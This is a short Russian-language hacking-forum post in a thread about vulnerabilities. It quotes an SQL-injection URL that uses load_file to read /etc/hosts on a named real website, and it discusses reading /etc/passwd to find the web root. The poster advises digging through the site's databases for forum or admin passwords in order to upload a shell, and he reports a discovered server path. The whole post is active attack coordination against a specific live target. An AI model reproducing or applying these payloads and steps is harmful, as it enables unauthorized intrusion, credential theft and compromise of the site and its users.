Тема
:
Ваши вопросы по уязвимостям.
Показать сообщение отдельно
#
4
25.05.2015, 15:13
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
Цитата:
Сообщение от
huntercs16
huntercs16 said:
↑
http://tele-club.ru/buyticket?event_...2,3,load_file(
"/etc/hosts"),5,6,7,8,9,10+--+;
А тут можно директорию определить?
/etc/passwd говорит о том что сайт может лежать в
/var/www/m.tele-club.ru/data/robots.txt
Но конкретно эту не хочет читать...
{ШЕЛЛЫ тоже запрещено выкладывать, логины и пароли тоже} ps нахтак
Опять же, по базам лазить нужно, там пути искать, а не только пытаться инклудить конфиги
Пароли от форума или админки поискать, и сразу уже залиться.
/var/www/tele-club.ru/www/forum/
вот такой путь получился
Br@!ns
Репутация